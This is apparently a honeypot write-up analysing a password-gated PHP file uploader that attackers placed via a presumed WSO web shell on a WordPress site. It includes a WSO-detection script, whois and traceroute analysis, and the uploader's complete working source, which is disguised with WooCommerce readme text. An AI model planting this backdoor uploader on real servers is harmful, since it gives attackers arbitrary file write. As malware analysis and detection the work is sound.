Simple file uploader with strange whois information.
At least one other analysis of this uploader appears on the web.
The attacker(s) seem to have believed they were accessing a WSO (Web Shell by oRb) web shell.
They requested a URL ending in /wp-content/themes/twentytwelve/404.php, a common spot for "hidden" web shells and backdoors to reside.
The HTTP POST request came with parameters typical for WSO:

| Name | Value |
|---|---|
| a | FilesMAn |
| c | /var/www/html/wp-content/themes/twentytwelve/ |
| p1 | uploadFile |
| charset | Windows-1251 |
The "a" parameter even has the odd "FilesMAn" capitalisation that appears in lots of WSO source. WSO dispatches on that value by calling the PHP function named "action" followed by the value of "a", and PHP function names are case-insensitive, so the odd spelling costs the attacker nothing and makes a handy fingerprint.
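Those four parameters are a usable detection signature. The following added Python example (not from the original page and not WSO's own code) scores a urlencoded POST body for WSO traits: the action name and its capitalisation, the working-directory parameter, the file-manager sub-action and the charset. The action and sub-action lists are assembled from common WSO variants and, like the weights and the threshold, are assumptions of the example; the first sample body reproduces the parameters in the table above and the second is a constructed WordPress heartbeat request.

```python
"""Score captured HTTP POST bodies for WSO (Web Shell by oRb) traits."""
import re
from typing import List, Tuple
from urllib.parse import parse_qs

# WSO calls the PHP function named 'action' . $_POST['a']; PHP function names are
# case-insensitive, so the comparison below is lower-cased. Assembled from common
# WSO variants (assumption of this example; extend it as you meet new builds).
WSO_ACTIONS = {
    "secinfo", "filesman", "filestools", "console", "sql", "php", "safemode",
    "stringtools", "bruteforce", "network", "logout", "selfremove",
}
# p1 sub-actions of WSO's file manager (same caveat).
WSO_FILE_P1 = {"uploadfile", "mkdir", "delete", "paste", "edit", "copy", "move",
               "zip", "unzip", "tar"}
ABS_PATH_RE = re.compile(r"^(/|[A-Za-z]:\\)")


def wso_score(body: str) -> Tuple[int, List[str]]:
    """Return (score, reasons) for one urlencoded POST body."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    score, reasons = 0, []

    a = params.get("a", "")
    if a.lower() in WSO_ACTIONS:
        score += 3
        reasons.append(f"a={a!r} is a WSO action name")
        if a == "FilesMAn":  # the exact spelling found in WSO's own UI code
            score += 1
            reasons.append("a carries WSO's 'FilesMAn' capitalisation")

    c = params.get("c", "")
    if ABS_PATH_RE.match(c):
        score += 1
        reasons.append(f"c={c!r} is an absolute working directory")

    p1 = params.get("p1", "")
    if p1.lower() in WSO_FILE_P1:
        score += 2
        reasons.append(f"p1={p1!r} is a WSO file-manager sub-action")

    if params.get("charset") == "Windows-1251":  # WSO's default charset
        score += 1
        reasons.append("charset=Windows-1251 is WSO's default")

    return score, reasons


def is_wso(body: str, threshold: int = 5) -> bool:
    """Threshold chosen so that an action name plus a path alone is not enough."""
    return wso_score(body)[0] >= threshold


# Constructed samples: the first reproduces the captured parameters from the
# table above, the second is an ordinary WordPress admin heartbeat.
CAPTURED = ("a=FilesMAn&c=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fthemes%2Ftwentytwelve%2F"
            "&p1=uploadFile&charset=Windows-1251")
WP_HEARTBEAT = "action=heartbeat&_nonce=0123abcd&interval=60"

if __name__ == "__main__":
    for body in (CAPTURED, WP_HEARTBEAT):
        score, why = wso_score(body)
        print(score, is_wso(body), why)
```

Run it over the bodies of POST requests to files that should never take a POST (a theme's 404.php, for instance); the score gives you something to sort by, and the reasons list tells the analyst why a request was flagged.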
The file was named "gan.php" on the attacker(s)' machine.
This particular request also carried the cookie that WSO treats as "previously logged in"; the attacker had logged in with a password of "w" 29 seconds earlier.
This was probably a manual install, with a browser driven by a human user.
The IP address asked for favicon.ico and the purported WSO URL immediately before uploading this file.
The client identified itself as "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0"; p0f3 identified the IP address as running "Windows 7 or 8" (NT 6.1 is Windows 7), so the user agent string is consistent with the passive OS fingerprint.
whois says that it's a Cogent IP address, but the AfriNIC Whois server answers, which looks weird at first. It is a matter of delegation: IANA lists 154/8 as administered by AfriNIC, so the whois client sends the query there, and AfriNIC hands back the ARIN record for this legacy 1992 allocation (note the rdap.arin.net reference at the bottom):
```text
% This is the AfriNIC Whois server.
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
NetRange: 154.48.0.0 - 154.48.255.255
CIDR: 154.48.0.0/16
NetName: COGENT-154-48-16
NetHandle: NET-154-48-0-0-1
Parent: NET154 (NET-154-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS174
Organization: PSINet, Inc. (PSI-2)
RegDate: 1992-02-05
Updated: 2017-10-30
Ref: https://rdap.arin.net/registry/ip/154.48.0.0
```
traceroute shows a route from Denver, CO, US through cogentco.com addresses, then on into NTT (gin.ntt.net, the Japanese carrier's global backbone) addresses:
```text
traceroute to 154.48.243.123 (154.48.243.123), 30 hops max, 60 byte packets
1 blahblah (612.624.54.912) 62.843 ms 62.827 ms 62.778 ms
2 10.100.100.2 (10.100.100.2) 62.755 ms 62.921 ms 62.694 ms
3 te0-0-1-1.nr11.b004491-1.den01.atlas.cogentco.com (38.122.238.45) 65.324 ms 65.302 ms 77.824 ms
4 te0-0-2-2.nr11.b006545-1.den01.atlas.cogentco.com (154.24.53.101) 87.984 ms 87.969 ms 87.925 ms
5 te0-0-1-2.agr14.den01.atlas.cogentco.com (154.24.17.121) 87.883 ms te0-0-2-1.agr12.den01.atlas.cogentco.com (154.24.13.53) 87.861 ms te0-0-1-2.agr13.den01.atlas.cogentco.com (154.24.17.117) 87.803 ms
6 te0-7-0-2.ccr22.den01.atlas.cogentco.com (154.54.30.229) 87.754 ms te0-7-0-11.ccr22.den01.atlas.cogentco.com (154.54.31.125) 40.248 ms te0-7-0-2.ccr22.den01.atlas.cogentco.com (154.54.30.229) 40.188 ms
7 be3035.ccr21.mci01.atlas.cogentco.com (154.54.5.90) 72.882 ms be3036.ccr22.mci01.atlas.cogentco.com (154.54.31.90) 72.841 ms be3035.ccr21.mci01.atlas.cogentco.com (154.54.5.90) 78.145 ms
8 be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213) 75.335 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133) 75.280 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213) 75.261 ms
9 be2764.ccr41.dfw03.atlas.cogentco.com (154.54.47.214) 89.879 ms 89.816 ms be2763.ccr41.dfw03.atlas.cogentco.com (154.54.28.74) 89.809 ms
10 ae-5.r10.dllstx09.us.bb.gin.ntt.net (129.250.9.205) 89.784 ms 89.743 ms 89.888 ms
11 ae-0.r23.dllstx09.us.bb.gin.ntt.net (129.250.5.5) 89.861 ms 89.835 ms 56.434 ms
12 ae-8.r23.snjsca04.us.bb.gin.ntt.net (129.250.4.154) 81.747 ms 81.469 ms 84.352 ms
13 ae-21.r30.tokyjp05.jp.bb.gin.ntt.net (129.250.5.77) 189.215 ms 189.151 ms 189.145 ms
14 ae-4.r24.tkokhk01.hk.bb.gin.ntt.net (129.250.2.51) 236.345 ms 295.354 ms 298.360 ms
15 ae-1.r03.tkokhk01.hk.bb.gin.ntt.net (129.250.6.98) 298.339 ms 298.282 ms 298.272 ms
16 ae-2.a01.newthk03.hk.bb.gin.ntt.net (129.250.6.125) 290.508 ms ae-1.a01.newthk03.hk.bb.gin.ntt.net (129.250.5.253) 290.493 ms ae-2.a01.newthk03.hk.bb.gin.ntt.net (129.250.6.125) 290.426 ms
17 xe-0-0-19-2-381.a01.newthk03.hk.ce.gin.ntt.net (192.80.17.90) 293.034 ms 267.935 ms 255.536 ms
18 * * *
19 * * *
20 154.48.243.123 (154.48.243.123) 222.118 ms 222.107 ms 217.720 ms
```
Notice the big jump in response times between ae-8.r23.snjsca04.us.bb.gin.ntt.net (129.250.4.154) and ae-21.r30.tokyjp05.jp.bb.gin.ntt.net (129.250.5.77): roughly 82 ms to 189 ms. The great-circle distance from San Jose to Tokyo is 5186 miles (about 8350 km), so light in a vacuum needs about 28 ms to cover it one way. Traceroute reports round-trip times, though, and light in fibre travels at roughly two-thirds of c, so the physical floor for that leg is about 85 ms round trip; most of the ~108 ms jump is plain propagation delay, and the rest is a less direct cable path plus queueing. The next big jump, from ae-21.r30.tokyjp05.jp.bb.gin.ntt.net to ae-4.r24.tkokhk01.hk.bb.gin.ntt.net, lands on a router whose hostname carries NTT's "hk" country label, so at that point the path has left Japan for Hong Kong.
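To make the latency reasoning concrete, the following added Python example (not from the original page) computes the great-circle distance between the cities the NTT hostnames point at and the round-trip floor for light in fibre, then compares that floor with the RTT jumps in the traceroute above. The city coordinates are rough city centres and the two-thirds-of-c fibre factor is a rule of thumb; both are assumptions of the example. It uses the best of the three probes per hop, since hop 14's probes vary from 236 ms to 298 ms and only the fastest one says anything about propagation.

```python
"""Compare traceroute RTT jumps against the physical minimum for each leg."""
import math
from typing import Dict, List, Tuple

C_VACUUM_KM_S = 299_792.458
FIBER_FACTOR = 0.67        # assumption: light in silica fibre travels at roughly 2/3 c
EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points given in decimal degrees."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def one_way_vacuum_ms(km: float) -> float:
    """One-way light time in a vacuum: the number people quote, not what traceroute measures."""
    return km / C_VACUUM_KM_S * 1000.0


def min_rtt_ms(km: float, fiber: bool = True) -> float:
    """Round-trip propagation floor, which is what traceroute's times actually are."""
    v = C_VACUUM_KM_S * (FIBER_FACTOR if fiber else 1.0)
    return 2.0 * km / v * 1000.0


# (hop label, lat, lon, best-of-three RTT in ms) for the NTT hops in the traceroute.
# Coordinates are rough city centres, an assumption of this example.
HOPS: List[Tuple[str, float, float, float]] = [
    ("snjsca04 (San Jose)", 37.34, -121.89, 81.469),
    ("tokyjp05 (Tokyo)", 35.68, 139.69, 189.145),
    ("tkokhk01 (Hong Kong)", 22.32, 114.17, 236.345),
]


def explain_jumps(hops=HOPS) -> List[Dict[str, object]]:
    """For each consecutive pair of hops, compare the RTT increase with the fibre floor."""
    legs = []
    for (n1, la1, lo1, r1), (n2, la2, lo2, r2) in zip(hops, hops[1:]):
        km = haversine_km(la1, lo1, la2, lo2)
        floor = min_rtt_ms(km)
        legs.append({
            "leg": f"{n1} -> {n2}",
            "km": round(km),
            "observed_ms": round(r2 - r1, 1),
            "fiber_floor_ms": round(floor, 1),
            "unexplained_ms": round(r2 - r1 - floor, 1),
        })
    return legs


if __name__ == "__main__":
    for leg in explain_jumps():
        print(leg)
```

An "unexplained" figure that is large and negative would mean the coordinates are wrong or the hostname is lying about where the router is; a modest positive one, as here, is just the cable not following the great circle plus queueing.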
ipaddres.is puts it on a peninsula on a lake near Hutchinson, KS, USA. That is what a country-level GeoIP answer looks like: MaxMind's default coordinate for "somewhere in the United States" sits in Cheney Reservoir, just south of Hutchinson, so the service knows only the country, not a city.
I don't think there's anything nefarious here, just that NTT isn't doing a great job of publicizing where its IP addresses live. I also think that Cogent has sold/leased a block of IP addresses to someplace in Hong Kong. The record keeping doesn't seem to have caught up.
This uploader protects itself by only functioning if the request URL's query string includes login=canshu. PHP fills $_GET from the query string regardless of the HTTP method, which is why the form can post to action="" (the same URL, gate parameter included) and still get through.
Even a pretty-printed version of this uploader is small enough to include directly:
```php
=== WooCommerce ===
Contributors: automattic, mikejolley, jameskoster, claudiosanches, claudiulodro, kloon, rodrigosprimo, jshreve, coderkevin
Tags: ecommerce, e-commerce, store, sales, sell, shop, cart, checkout, downloadable, downloads, paypal, storefront, woo commerce
what times wordpress
<?php
if ($_GET["login"] == "canshu") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo '<b>Upload Complate !!!</b><br>';
    }
    echo '<form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" size="50"><input type="submit" value="submit"/></form>';
}
```
This code has some weird aspects.
The PHP interpreter sends the small block of plain ASCII text before the <?php tag to the client verbatim on every access: anything outside PHP tags is output, not code.
At first, I thought this was a Google "dork", some chunk of text that Google would index, and attacker(s) could find with a simple search.
As of 2019-03-02, this uploader's source does appear on some Russian-language web pages, and you can find it by searching for that block of text.
But uploaders are not the most common thing the block of text turns up: you get many more hits on plain WooCommerce installs, because the same block opens the readme.txt shipped with the WooCommerce plugin.
I don't know what to make of the inclusion of that chunk of text.
It also generates incomplete HTML: there are no <html> or <body> tags around the <form> it outputs. This is just shoddy.